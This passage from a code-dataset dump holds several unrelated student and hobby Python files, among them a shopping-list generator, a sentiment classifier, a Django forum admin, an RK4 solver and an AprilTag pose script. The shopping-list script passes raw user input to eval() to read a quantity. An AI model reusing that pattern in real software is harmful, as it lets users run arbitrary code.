linkage=\"ward\")\nresults_ahc_hk = machine.fit_predict(df_hk)\n\nsilhouette = (silhouette_score(df_hk, results_ahc_hk, metric = 'euclidean'))\nprint(silhouette)\n\n\n\n\n\n\n\n","repo_name":"ghfinley/ECON860_Final","sub_path":"compare_countries.py","file_name":"compare_countries.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"35829928040","text":"from ShoppingItem import ShoppingItem\r\nimport datetime\r\n\r\n'''\r\nDaniel Anderson\r\nCS521 Due 5/2/2018\r\nProject\r\nShoppingListGenerator.py\r\n'''\r\n\r\ndef getShoppingPriceList():\r\n \"\"\" Import the price list file as a list of dictionaries \"\"\"\r\n infile = open(\"shopping_price_list.txt\", \"r\", encoding='utf-8-sig')\r\n list = infile.readlines()\r\n price_list = []\r\n infile.close()\r\n for x in list:\r\n lst = x.replace('\\n', '').split('; ')\r\n price_dict = {\"Name\": lst[0], \"Price\": float(lst[1]), \"Taxable\": lst[2]}\r\n price_list.append(price_dict)\r\n return price_list\r\n\r\n\r\ndef findItems(prices, str):\r\n \"\"\"\r\n Search the items on the price list and return a smaller list of possible choices\r\n\r\n :param prices: price list of all availble items, list of dictionaries\r\n :param str: string that is being searched\r\n :return: list of possible choices from the price list that match the user's search\r\n \"\"\"\r\n smallerList = []\r\n for i in prices:\r\n if( i[\"Name\"].lower().find(str.lower()) != -1):\r\n smallerList.append(i)\r\n return smallerList\r\n\r\n\r\ndef displayList(myList):\r\n \"\"\"\r\n Returns a string of the list and displays the list to the console.\r\n\r\n :param myList: list of ShoppingItems chosen by the user\r\n :return: string of the user's shopping list\r\n \"\"\"\r\n tax = 0 # To track the total amount of tax\r\n subtotal = 0 # To track the total price of all the items\r\n list_text = \"\" # String list that will be printed to the console and returned\r\n list_text += \"\\nYour Shopping List - \\n\"\r\n list_text += (\"{0:75s} {1:>20s} {2:>18s} {3:>20s}\".format(\"\\tName of the Item:\", \"Unit Price($):\", \"Quantity:\", \"Total Price($):\") + \"\\n\")\r\n for item in myList:\r\n list_text += (\"\\t\" + str(item) + \"\\n\")\r\n subtotal += item.getTotalPrice()\r\n if( item.IsTaxable()):\r\n tax = tax + 
(item.getPrice() * item.getTaxRate())\r\n total = subtotal + tax\r\n list_text += (\"\\n{0:>125s} {1:>8.2f}\\n\".format(\"Your subtotal is:\", subtotal))\r\n list_text += (\"{0:>125s} {1:>8.2f}\\n\".format(\"Tax:\", tax))\r\n list_text += (\"{0:>125s} {1:>8.2f}\\n\".format(\"Your total amount:\", total))\r\n print(list_text)\r\n return list_text\r\n\r\ndef saveList(list_text):\r\n \"\"\"\r\n Write the list to a text file with a datestamp using the string representation\r\n cite - https://www.saltycrane.com/blog/2008/06/how-to-get-current-date-and-time-in/\r\n\r\n :param list_text:\r\n :return:\r\n \"\"\"\r\n today = datetime.datetime.now().strftime(\"%m%d%Y\") # Get the date for the date stamp\r\n filename = \"shopping_list_\" + today + \".txt\"\r\n outfile = open(filename, \"w\")\r\n outfile.write(list_text)\r\n outfile.close()\r\n\r\ndef main():\r\n \"\"\"\r\n The main function runs the ShoppingListGenerator. This method loads the pricing list into the program as a list\r\n of dictionaries. It then prompts the user to enter a search term for items the user wants. It produces a list of\r\n possible items that match the user's search parameters and prompts the user to keep returning if the list has more\r\n than one item. It prompts the user to search again or exit and prompts the user to save the file.\r\n \"\"\"\r\n price_list = getShoppingPriceList() # Get the pricing list\r\n myList = [] # Create the user's list\r\n isShopping = True # Set isShopping to true to run the loop\r\n\r\n\r\n # Several items are pre-loaded into the list for testing\r\n \"\"\"\r\n item1 = ShoppingItem(\"Apples\", 2.99, \"N\", 2)\r\n item2 = ShoppingItem(\"Bacon\", 2.99, \"N\", 3)\r\n item3 = ShoppingItem(\"Beef Stew Meat\", 4.19, \"N\", 4)\r\n item4 = ShoppingItem(\"Butter\", 2.29, \"N\", 5)\r\n item5 = ShoppingItem(\"Carrots\", 1.29, \"N\", 4)\r\n item7 = ShoppingItem(\"Coffee\", 4.99, \"N\", 2)\r\n item8 = ShoppingItem(\"Eggs\", 1.09, \"N\", 1)\r\n item9 = ShoppingItem(\"French Fries\", 1.89, \"N\", 1)\r\n item10 = ShoppingItem(\"Ground Beef (sirloin, 90/10)\", 3.49, \"N\", 1)\r\n item11 = ShoppingItem(\"Ham\", 2.99, \"N\", 2)\r\n item12 = ShoppingItem(\"Hand soap\", 0.89, \"Y\", 4)\r\n item13 = ShoppingItem(\"Ketchup\", 1.49, \"N\", 2)\r\n item14 = ShoppingItem(\"Measuring spoons\", 1.19, \"Y\", 1)\r\n item15 = ShoppingItem(\"Milk\", 1.99, \"N\", 2)\r\n item16 = ShoppingItem(\"Oat Meal\", 1.49, \"N\", 2)\r\n item18 = ShoppingItem(\"Spatula\", 1.79, \"Y\", 3)\r\n item20 = ShoppingItem(\"Wipes\", 2.89, \"Y\", 2)\r\n \r\n myList.append(item2)\r\n myList.append(item3)\r\n myList.append(item4)\r\n myList.append(item5)\r\n myList.append(item7)\r\n myList.append(item8)\r\n myList.append(item9)\r\n myList.append(item10)\r\n myList.append(item11)\r\n myList.append(item12)\r\n myList.append(item13)\r\n myList.append(item14)\r\n myList.append(item15)\r\n myList.append(item16)\r\n myList.append(item18)\r\n myList.append(item20)\r\n \"\"\"\r\n\r\n while( isShopping ):\r\n usingList = True # Set to true if the user will be using the list\r\n\r\n # Prompt user to enter an item for the shopping list\r\n item = input(\"\\nPlease enter an item to search the list. Enter 'exit' to exit: \")\r\n\r\n # If the user types exit, prompts the user to save and exits the program\r\n if( item == 'exit'):\r\n isShopping = False;\r\n if( len(myList) == 0):\r\n print(\"\\n No items were chosen. 
Shopping list was not created.\")\r\n else:\r\n list_text = displayList(myList)\r\n savedList = input(\"To save the list, enter 'Y' or 'y': \")\r\n if( savedList.upper() == 'Y'):\r\n saveList(list_text)\r\n break\r\n\r\n # Gets the list of possible item matches for the user\r\n while( usingList):\r\n items = findItems(price_list, item)\r\n\r\n # If no items were found, prints message to the console and exits the inner loop\r\n if( len(items) == 0):\r\n print(\"\\nSorry, the item entered wasn't found.\")\r\n usingList = False\r\n\r\n # Prints the list of matches to the screen\r\n else:\r\n print(\"\\nThe following items were found: \\n\")\r\n for i in range(len(items)):\r\n print(\"\\t{}. {} - {}\".format(i+1, items[i][\"Name\"], items[i][\"Price\"]))\r\n\r\n # Ask the user to choose from the list, validate user input\r\n str_index = input(\"\\nPlease select an item from the list or enter '0' to search again. \")\r\n isValid = False\r\n while( not isValid): # index > len(items)\r\n if( not str_index.isdigit()):\r\n str_index = input(\"Entry is not an integer. Please select an item from the list or enter '0' to search again. \")\r\n elif( int(str_index) not in range(0, len(items) + 1)):\r\n str_index = input(\"Entry is not in the list. Please select an item from the list or enter '0' to search again. \")\r\n else:\r\n index = int(str_index)\r\n isValid = True\r\n\r\n if( index != 0):\r\n\r\n # Ask the user for a quantity\r\n qty = eval(input(\"Please enter the quantity of the item you would like to purchase. \"))\r\n\r\n # Create the shopping item and add to the list\r\n shopping_item = ShoppingItem(items[index - 1][\"Name\"], items[index - 1][\"Price\"],\r\n items[index - 1][\"Taxable\"], qty)\r\n myList.append(shopping_item)\r\n print(\"\\n{1} was added to your list, quantity of {0}.\\n\".format(shopping_item.getQuantity(), shopping_item.getName()))\r\n\r\n # Prompts the user to return to the search list if the search list has more than one item\r\n if( len(items) <= 1):\r\n usingList = False\r\n else:\r\n key = input(\"Press any key to return to the search list or enter '0' to search again. 
\")\r\n if(key == '0'):\r\n usingList = False\r\n\r\n # Exit the inner loop\r\n else:\r\n usingList = False\r\n\r\n\r\n# Run main method\r\nmain()\r\n","repo_name":"dan31877/Programming-Projects","sub_path":"ShoppingList-Python/ShoppingListGenerator.py","file_name":"ShoppingListGenerator.py","file_ext":"py","file_size_in_byte":8281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"4376521842","text":"#----constantes----#\nPREGUNTA_NOMBRE = \"digite nombre : \"\npreguntaedad = \"digite edad\"\nmensajesaludo = \"un gusto conocerte\"\npreguntaestatura = \"digite estatura\"\nestatura = float(input (preguntaestatura))\nnombre = input (PREGUNTA_NOMBRE)\nedad = int (input (preguntaedad))\nprint (mensajesaludo, nombre)\nprint (edad+8)","repo_name":"tomi8a/programandodelaaalaz","sub_path":"clases/inputsclase.py","file_name":"inputsclase.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"17655300809","text":"import csv\nimport re\nimport numpy as np\nimport warnings\nfrom sklearn.preprocessing import MultiLabelBinarizer\nfrom sklearn.pipeline import FeatureUnion, Pipeline\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import f1_score, precision_score, recall_score\nfrom sklearn.model_selection import KFold\nfrom sklearn.externals import joblib\n\nclass SentimentExtractor(object):\n\n ASPECTS = ['cleanliness', 'food/drinks', 'location', 'room amenities', 'staff']\n TARGET_NAMES = ['negative', 'positive']\n\n def __init__(self):\n self.clf = []\n for i in range(len(self.ASPECTS)):\n pipeline = Pipeline([\n ('features', FeatureUnion(\n transformer_list = [\n ('bag_of_ngram', CountVectorizer(ngram_range=(1, 5)))\n ]\n )),\n ('clf', LogisticRegression())\n ])\n self.clf.append(pipeline)\n\n @classmethod\n def read_data(cls, filename):\n \"\"\"\n Load dataset from csv.\n\n Parameters\n ----------\n filename: Filename of the dataset in csv.\n\n Returns\n -------\n data: Review sentences grouped by aspects.\n targets: data labels grouped by aspects.\n \"\"\"\n data = [[] for i in range(len(cls.ASPECTS))]\n targets = [[] for i in range(len(cls.ASPECTS))]\n regex = re.compile('[^0-9a-zA-Z]+')\n\n with open(filename, encoding='utf-8') as f:\n reader = csv.reader(f, delimiter=';', quotechar='\"')\n next(reader)\n for row in reader:\n text = regex.sub(' ', row[0])\n for i in range(1, len(cls.ASPECTS) + 1):\n if row[i] != '-':\n data[i - 1].append(text)\n targets[i - 1].append(cls.TARGET_NAMES.index(row[i]))\n\n return data, targets\n\n def fit(self, X, y):\n \"\"\"\n Train model.\n\n Parameters\n ----------\n X: Train data grouped by aspects.\n y: Train data labels grouped by aspects.\n\n Returns\n -------\n self\n \"\"\"\n for i in range(len(self.ASPECTS)):\n self.clf[i].fit(X[i], y[i])\n return self\n\n def predict(self, X):\n \"\"\"\n Predict the given data.\n\n Parameters\n ----------\n X: Data to predict (contain dict with sentence and aspects as key).\n\n Returns\n -------\n results: data and labels for the given data.\n \"\"\"\n results = []\n for i in range(len(X)):\n result = {}\n result['sentence'] = X[i]['sentence']\n result['aspects'] = []\n for aspect in X[i]['aspects']:\n aspect_result = {}\n aspect_result['aspect'] = aspect\n index = self.ASPECTS.index(aspect)\n label = self.clf[index].predict([X[i]['sentence']])\n aspect_result['polarity'] = 
self.TARGET_NAMES[label[0]]\n result['aspects'].append(aspect_result)\n results.append(result)\n return results\n\n def cross_validate(self, X, y, k):\n \"\"\"\n KFold cross validation.\n\n Parameters\n ----------\n X: Train data grouped by aspects.\n y: Train data labels grouped by aspects.\n k: Number of folds.\n \"\"\"\n kf = KFold(n_splits=k)\n warnings.filterwarnings('ignore')\n print(\"Cross validation results:\")\n for i in range(len(self.ASPECTS)):\n print(\"\\tCategory:\", self.ASPECTS[i])\n precision_scores = []\n recall_scores = []\n f1_scores = []\n for train_index, test_index in kf.split(X[i]):\n X[i] = np.array(X[i])\n y[i] = np.array(y[i])\n X_train, X_test = X[i][train_index], X[i][test_index]\n y_train, y_test = y[i][train_index], y[i][test_index]\n\n self.clf[i].fit(X_train, y_train)\n y_pred = self.clf[i].predict(X_test)\n\n precision_scores.append(precision_score(y_test, y_pred, average='macro'))\n recall_scores.append(recall_score(y_test, y_pred, average='macro'))\n f1_scores.append(f1_score(y_test, y_pred, average='macro'))\n\n print(\"\\t\\tPrecision:\", np.array(precision_scores).mean())\n print(\"\\t\\tRecall:\", np.array(recall_scores).mean())\n print(\"\\t\\tF1-score:\", np.array(f1_scores).mean())\n\n def evaluate(self, test_data_filename):\n \"\"\"\n Evaluate the trained model using test data.\n\n Parameters\n ----------\n test_data_filename: Filename for the test data.\n \"\"\"\n X, y = SentimentExtractor.read_data(test_data_filename)\n\n print(\"Evaluation results:\")\n for i in range(len(self.ASPECTS)):\n print(\"\\tCategory:\", self.ASPECTS[i])\n y_pred = self.clf[i].predict(X[i])\n\n print(\"\\t\\tPrecision:\", precision_score(y[i], y_pred, average='macro'))\n print(\"\\t\\tRecall:\", recall_score(y[i], y_pred, average='macro'))\n print(\"\\t\\tF1-score:\", f1_score(y[i], y_pred, average='macro'))\n\n print(\"\\t\\tWrong classification:\")\n count = 0\n for j in range(len(X[i])):\n if y_pred[j] != y[i][j]:\n count += 1\n print(\"\\t\\t\\tSentence:\" , X[i][j])\n print(\"\\t\\t\\tActual:\", y[i][j])\n print(\"\\t\\t\\tPrediction:\", y_pred[j])\n print(\"\\t\\tNumber of wrong classification:\", count, \"out of\", len(X[i]))\n\n def save_model(self, model_filename):\n \"\"\"\n Save trained model.\n\n Parameters\n ----------\n model_filename: Filename for the trained model.\n\n Returns\n -------\n self\n \"\"\"\n for i in range(len(self.ASPECTS)):\n joblib.dump(self.clf[i], model_filename + str(i))\n return self\n\n def load_model(self, model_filename):\n \"\"\"\n Load trained model.\n\n Parameters\n ----------\n model_filename: Filename for the trained model.\n\n Returns\n -------\n self\n \"\"\"\n for i in range(len(self.ASPECTS)):\n self.clf[i] = joblib.load(model_filename + str(i))\n return self\n\nif __name__ == '__main__':\n X, y = SentimentExtractor.read_data(\"../../data/sentiment_extractor/train_data.csv\")\n extractor = SentimentExtractor()\n extractor.cross_validate(X, y, 10)\n print()\n extractor.fit(X, y)\n extractor.evaluate(\"../../data/sentiment_extractor/test_data.csv\")\n extractor.save_model(\"../../model/sentiment_extractor.mdl\")\n extractor.load_model(\"../../model/sentiment_extractor.mdl\")\n # print(extractor.predict([{'sentence': 'Good location', 'aspects': ['location']}, {'sentence': 'Love the food here', 'aspects': 
['food/drinks']}]))\n","repo_name":"wennyyustalim/absa-learning-model","sub_path":"absa/app/sentiment_extractor/sentiment_extractor.py","file_name":"sentiment_extractor.py","file_ext":"py","file_size_in_byte":7011,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"19003864899","text":"import codecs;\nusrt={};\nusrc={};\nusrl={};\nusraptme={};\nusr=[];\ngo=[];\nwith open('fork.txt') as f:\n\tfor line in f:\n\t\tline=line.replace('\\n',''); # VERY IMPORTANT !!!\n\t\tif line != '': #avoid empty line\n\t\t\tusraptme[line]=0;\n\t\t\tusr.append(line);\n\t\t\tusrt[line]=0;\n\t\t\tusrc[line]=0;\n\t\t\tusrl[line]=0;\n#bld fork usr lst\nprint('finish loading');\n#print(usr);\ni=1;\nwith open('train.txt') as f:\n\tfor line in f:\n\t\tif line != '':\n\t\t\tname= line.split('\\t')[0];\n\t\t\tif name in usr:\n\t\t\t\tprint('find '+str(i));\n\t\t\t\ti=i+1;\n\t\t\t\tusraptme[name]=usraptme[name]+1; #add\n\t\t\t\tsplit=line.split('\\t');\n\t\t\t\tusrt[name]=int(usrt[name])+int(split[3]);\n\t\t\t\tusrc[name]=int(usrc[name])+int(split[4]);\n\t\t\t\tusrl[name]=int(usrl[name])+int(split[5]);\ncount=1;\nfor user in usr:\n\tif (int(usrt[user])/int(usraptme[user])) < 2:\n\t\tif (int(usrc[user])/int(usraptme[user])) < 2:\n\t\t\tif (int(usrl[user])/int(usraptme[user])) < 2:\n\t\t\t\tprint(count);\n\t\t\t\tcount=count+1;\n\t\t\t\tgo.append(user);\nwith codecs.open('rubbishuser.txt','a','utf8') as c:\n\tfor goal in go:\n\t\tc.write(goal+'\\n');\n#by DGideas\n","repo_name":"LabsCluster/WeiboPredict","sub_path":"findrubbishusr.py","file_name":"findrubbishusr.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"84"} +{"seq_id":"31524241407","text":"from django.contrib import admin\nfrom django.utils import timezone\n\nfrom .models import Section, Subsection, Thread, Post\n\nclass SubsectionInline(admin.TabularInline):\n    model = Subsection\n\nclass SectionAdmin(admin.ModelAdmin):\n    inlines = [SubsectionInline]\n\nclass ThreadInline(admin.TabularInline):\n    model = Thread\n\nclass SubsectionAdmin(admin.ModelAdmin):\n    inlines = [ThreadInline]\n\nclass PostInline(admin.TabularInline):\n    model = Post\n\nclass ThreadAdmin(admin.ModelAdmin):\n    inlines = [PostInline]\n\n    def save_model(self, request, obj, form, *args, **kwargs):\n        return\n    def save_formset(self, request, form, formset, change):\n        #print(dir(formset), form, formset.forms, \"FORMSET\")\n        form_data = cleanup_attribs(form.data)\n\n        if formset.is_valid():\n            data = cleanup_attribs(formset.data)\n            posts = []\n            def try_int(x):\n                try:\n                    return int(x)\n                except ValueError:\n                    return float(\"inf\")\n            keys = sorted(list(data.keys()), key=lambda x: try_int(x))\n            for key in keys:\n                try:\n                    int(key)\n                except ValueError:\n                    continue\n                \n                posts.append(Post.prepare(title=data[key][\"title\"],\n                                          text=data[key][\"text\"],\n                                          author=data[key][\"author\"],\n                                          #data[key][\"post_date\"]\n                                          post_date=timezone.now()))\n            thread = Thread.create(post=posts[0], **form_data)\n\n            thread.save()\n            for post in posts[1:]:\n                try:\n                    post(thread).full_clean()\n                    post(thread).save()\n                except ValueError:\n                    pass\n\nadmin.site.register(Post)\nadmin.site.register(Section, SectionAdmin)\nadmin.site.register(Subsection, SubsectionAdmin)\nadmin.site.register(Thread, ThreadAdmin)\n 
\n","repo_name":"marky1991/galcon_clone","sub_path":"galcon/forums/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"43956318422","text":"# \r\n# deuxiéme séance\r\n# \r\n#\r\n# fixation des valeurs :\r\nk1, k2 = 0.1, 0.05\r\nt0, tmax, Dt =0, 10, 0.05\r\ni = 0\r\nB0, Bi, C0, Ci = 0, 0, 0, 0\r\n\r\n#le choix de [A]\r\nA0 = float(input('Choisir la valeur de [A]0: '))\r\n\r\n#initialisation\r\nAi = A0\r\nti = t0\r\n\r\n# boucle RK4\r\nwhile ti <= tmax:\r\n print('t = %3.3f s - [A]%3.f = %3.3f mol/L - [B]%3.f = %3.3f mol/L - [C]%3.f = %3.3f mol./L' %(ti, i, Ai, i, Bi, i, Ci))\r\n\r\n #calculation des quantités intermidiaires pour A\r\n AS1 = Dt * (- k1 * Ai)\r\n AS2 = Dt * (- k1 * (Ai + 1/2*AS1))\r\n AS3 = Dt * (- k1 * (Ai + 1/2*AS2))\r\n AS4 = Dt * (- k1 * (Ai + AS3))\r\n\r\n #calculation des quantités intermidiaires pour B\r\n BS1 = Dt * (k1 * Ai - k2 * Bi)\r\n BS2 = Dt * (k1 * (Ai + 1/2*AS2) - k2 * (Bi + 1/2 * BS1))\r\n BS3 = Dt * (k1 * (Ai + 1/2*AS2) - k2 * (Bi + 1/2 * BS2))\r\n BS4 = Dt * (k1 * (Ai + 1/2*AS3) - k2 * (Bi + 1/2 * BS3))\r\n\r\n #Claculation de [A]i+1, [B]i+1 et [C]i+1 en utilisant les meme variable Ai, Bi et Ci\r\n Ai = Ai + 1/6 * (AS1 + 2 * AS2 + 2 * AS3 + AS4)\r\n Bi = Bi + 1/6 * (BS1 + 2 * BS2 + 2 * BS3 + BS4)\r\n Ci = A0 + B0 + C0 - Ai - Bi\r\n\r\n # incrementation de i\r\n i = i + 1\r\n ti = t0 + i * Dt\r\n","repo_name":"MdAMALLAL/rk4","sub_path":"2_deuxiem_seance.py","file_name":"2_deuxiem_seance.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"12201791182","text":"# imports\nimport os\nimport logging\nimport sys\n\nlogging_str = \"[%(asctime)s : %(levelname)s : %(module)s : %(message)s]\"\n\n# create the log file\nlog_dir = \"logs\"\nlog_filepath = os.path.join(log_dir,\"runnning_logs.log\")\nos.makedirs(log_dir,exist_ok=True)\n\nlogging.basicConfig(\n level = logging.INFO,\n format=logging_str,\n handlers=[\n logging.FileHandler(log_filepath), # to log in a file\n logging.StreamHandler(sys.stdout) # to show it in a terminal\n ]\n)\n\nlogger = logging.getLogger(\"textSummaryLogger\")","repo_name":"JaiSuryaPrabu/text-summary-mlops","sub_path":"src/text_summary/logging/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"14299835162","text":" \nimport numpy as np\nimport random\n\nfrom networks.developmental_network import *\n\nnp.random.seed(1993)\nrandom.seed(1993)\ntorch.cuda.manual_seed_all(1993)\ntorch.manual_seed(1993)\n\ndef create_layers(config):\n \"\"\"Create weight and bias tensors for the different layers\n\n Args:\n config: The config.\n\n Returns:\n (....): Tuple containing:\n\n - **W**: list of length of layers-1 with weights for layer l+1 to l.\n - **b**: list of length of layers-1 with biases of layer l+1.\n \"\"\"\n W = []\n b = []\n for l in range(len(config['N']) - 1):\n W_new = torch.randn((config['N'][l], config['N'][l+1]), \n device=config['device'], \n dtype=config['dtype'])\n nn.init.kaiming_uniform_(W_new, a=np.sqrt(5))\n W.append(W_new)\n\n b_new = torch.randn(config['N'][l+1], \n device=config['device'], \n dtype=config['dtype'])\n bound = 1./np.sqrt(config['N'][l+1])\n nn.init.uniform_(b_new, -bound, +bound)\n b.append(b_new)\n return (W, b)\n\n\ndef sample_data(M, W, 
b, config, alphas):\n \"\"\"Sample data from the weights and biases of the teacher.\n\n Args: \n M: number of desired samples\n W: list of weights of the teacher\n b: list of biases of the teacher\n alphas: list of alpha values in layer l+1 of the teacher.\n\n Returns: \n x: tensor of dataset inputs (M x config['N'][0])\n y: tensor of dataset outputs (M x config['N'][-1].\n \"\"\"\n x = torch.randn((M, config['N'][0]), device=config['device'], \n dtype=config['dtype'])\n h = x\n for l in range(len(config['N']) - 1):\n z = torch.matmul(h, W[l]) + b[l]\n h = nn.functional.leaky_relu(z, negative_slope=alphas[l])\n y = h\n\n return x, y\n\ndef create_dataloader(x, y, B=100):\n \"\"\"Split x and y tensors into batches of size B and return dataloader.\n\n Args:\n x: The inputs.\n y: The targets.\n B (int): The batch size.\n\n Returns:\n out: list (dataloader) with pairs of inputs-output batches.\n \"\"\"\n out = []\n batches = np.floor(np.shape(x)[0]/B).astype(int)\n for i in range(batches):\n out.append([x[i*B:(i+1)*B,:], y[i*B:(i+1)*B]])\n\n return out\n\ndef generate_data(config, alphas=None):\n \"\"\"Create training and evaluation dataloaders from a random teacher.\n\n Args:\n alphas: list of the negative slope of units in each hidden layer.\n\n Returns: \n train_dl: training dataloader set\n valid_dl: validation dataloader set.\n \"\"\"\n\n # Generate default alphas vector or check input alphas vector\n if alphas == None:\n alphas = [0. for i in range(len(config['N'])-2)]\n if not(len(alphas) + 2 == len(config['N'])):\n raise ValueError('The size of alphas vector is not suitable.')\n alphas.append(1) # output linear layer\n\n W, b = create_layers(config)\n\n # Create training set\n x, y = sample_data(config['M'], W, b, config, alphas)\n train_dl = create_dataloader(x, y, B=config['B'])\n\n # Create validation set\n x, y = sample_data(config['MV'], W, b, config, alphas)\n valid_dl = create_dataloader(x, y, B=config['T'])\n\n return train_dl, valid_dl \n\n\nif __name__=='__main__':\n\n config = {'N':[30, 20, 10],\n 'B':100, # train batch size\n 'T':1000, # test batch size\n 'M':60000, # samples for training\n 'MV':10000, # samples for validation\n 'epochs':5, \n 'w_lr':0.05,\n 'a_lr': 0., \n 'device':torch.device('cuda:0'),\n 'dtype': torch.float,\n 'optim_func':optim.SGD,\n 'loss_func':nn.MSELoss(),\n 'bias':True,\n 'plot':False,\n 'gidx':1, # layer index for growth\n 'mutation_period':2,\n 'input_reshape':(lambda x:x),\n 'grow_v':False,\n 'grow_h':False,\n 'h_gidx':1, # layer index for growth\n 'v_gidx':1, # layer index for growth\n 'instances':1} # frequency to grow\n\n t_dl, v_dl = generate_data(config)\n\n loss = np.zeros((config['epochs'], config['instances']))\n alpha = [[] for i in range(config['instances'])]\n\n for i in range(config['instances']):\n print('\\nRunning instance %d/%d'%(i+1, config['instances']))\n _, loss[:,i], _, alpha[i] = run_network(config, t_dl, v_dl)\n\n plot_results(loss, _, alpha, config)","repo_name":"mariacer/developmental_net","sub_path":"run_teacher_data.py","file_name":"run_teacher_data.py","file_ext":"py","file_size_in_byte":4588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"34522612166","text":"from sleeper_wrapper import Stats, Players\nimport pandas as pd\n\nclass StatsDF:\n \"\"\"\n Class to manage player stats for a specific season.\n \"\"\"\n def __init__(self, season_type: str = None, season_year: int = None):\n self.season_type = season_type\n self.season_year = season_year\n 
self.stats = Stats()\n self.players = Players()\n self.players_df = None # This will store the DataFrame with players\n self.stats_df = None # This will store the DataFrame with stats\n self.all_stats = None # This will store the merged DataFrame\n\n self.selected_columns = [\n 'search_full_name','player_id', 'team', 'fantasy_positions', 'years_exp',\n 'active','age','height','weight','depth_chart_order'\n ]\n\n if season_year is not None and season_type is not None:\n self.refresh_stats()\n\n def refresh_stats(self):\n \"\"\"\n Get stats for the specified season type and year\n and assign the DataFrame with players.\n \"\"\"\n self.stats_df = self.stats.get_all_stats(self.season_type, self.season_year)\n self.stats_df = self.stats_df.T\n self.players_df = self.get_players_df()\n self.all_stats = self.merge_players_df()\n self.all_stats = self.make_column_first('search_full_name')\n\n def get_players_df(self) -> pd.DataFrame:\n \"\"\"\n Retrieve all players and filter selected columns.\n \"\"\"\n all_players = self.players.get_all_players()\n players_df = pd.DataFrame(all_players)\n players_df = players_df.T\n return players_df[self.selected_columns]\n\n def merge_players_df(self) -> pd.DataFrame:\n \"\"\"\n Merge player stats and details.\n \"\"\"\n return pd.merge(self.stats_df, self.players_df, how='outer', on='player_id')\n\n def get_stats_df(self) -> pd.DataFrame:\n \"\"\"\n Return the DataFrame with stats.\n \"\"\"\n return self.stats_df\n\n def display_stats_df(self) -> None:\n \"\"\"\n Display the first few rows of the DataFrame.\n \"\"\"\n print(self.all_stats.head())\n\n def make_column_first(self, col_name: str) -> pd.DataFrame:\n \"\"\"\n Move specified column to the first position and sort the DataFrame by column.\n \"\"\"\n col_to_move = self.all_stats.pop(col_name)\n self.all_stats.insert(0, col_name, col_to_move)\n return self.all_stats.sort_values(by=col_name, axis=0)\n","repo_name":"Curlyams/Fantasy_Fb_ML","sub_path":"fb_class.py","file_name":"fb_class.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"10204094959","text":"import numpy as np\nimport cv2\nimport math\nfrom scipy.optimize import fsolve\nss = 0.5\nsrc = np.array([[-ss, -ss, 0],\n [ss, -ss, 0],\n [ss, ss, 0],\n [-ss, ss, 0]])\n#500 is scale\nKmat = np.array([[700, 0, 0],\n [0, 700, 0],\n [0, 0, 1]]) * 1.0\ndisCoeffs= np.zeros([4, 1]) * 1.0\nedges = np.array([[0, 1],\n [1, 2],\n [2, 3],\n [3, 0]])\ndef project(H,point):\n x = point[0]\n y = point[1]\n z = H[2,0]*x +H[2,1]*y+H[2,2]\n\n point[0] = (H[0,0]*x+H[0,1]*y+H[0,2])/z*1.0\n point[1] = (H[1, 0]*x+H[1, 1] *y + H[1, 2]) / z*1.0\n return point\n\ndef project_array(H):\n ipoints = np.array([[-1,-1],\n [1,-1],\n [1,1],\n [-1,1]])\n for point in ipoints:\n point = project(H,point)\n\n return ipoints\n\ndef sovle_coord(R1,R2,R3,edge = 1060):\n x = -(R2*R2 - R1*R1 - edge**2) / (2.0*edge)\n y = -(R3*R3 - R1*R1 - edge**2) / (2.0*edge)\n z = (np.sqrt(R1*R1 - x * x - y * y))-edge\n return x,y,z\n\n\ndef verify_z(x,y,R4,edge = 1060):\n x = edge - x\n y = edge - y\n rand2 = x**2+y**2\n h = np.sqrt(R4**2 - rand2)\n return edge - h\n\n\ndef get_Kmat(H):\n campoint = project_array(H)*1.0\n opoints = np.array([[-1.0, -1.0, 0.0],\n [1.0, -1.0, 0.0],\n [1.0, 1.0, 0.0],\n [-1.0, 1.0, 0.0]])\n opoints = opoints*0.5\n rate, rvec, tvec = cv2.solvePnP(opoints, campoint, Kmat, disCoeffs)\n return rvec,tvec\n\ndef get_pose_point(H):\n \"\"\"\n 将空间坐标转换成相机坐标\n Trans the point to 
camera point\n :param H: homography\n :return:point\n \"\"\"\n rvec, tvec = get_Kmat(H)\n point, jac = cv2.projectPoints(src, rvec, tvec, Kmat, disCoeffs)\n return np.int32(np.reshape(point,[4,2]))\n\ndef get_pose_point_noroate(H):\n \"\"\"\n 将空间坐标转换成相机坐标但是不旋转\n Trans the point to camera point but no rotating\n :param H: homography\n :return:point\n \"\"\"\n rvec, tvec = get_Kmat(H)\n point, jac = cv2.projectPoints(src, np.zeros(rvec.shape), tvec, Kmat, disCoeffs)\n return np.int32(np.reshape(point,[4,2]))\n\ndef average_dis(point,k):\n return np.abs( k/np.linalg.norm(point[0] - point[1]))\ndef average_pixel(point):\n return np.abs( np.linalg.norm(point[0] - point[1]))\ndef get_distance(H,t):\n points = get_pose_point_noroate(H)\n return average_dis(points,t)\ndef get_min_distance(array_detections,t):\n min = 65535;\n for detection in array_detections:\n #print(detection.id)\n dis = get_distance(detection.homography,t)\n if dis < 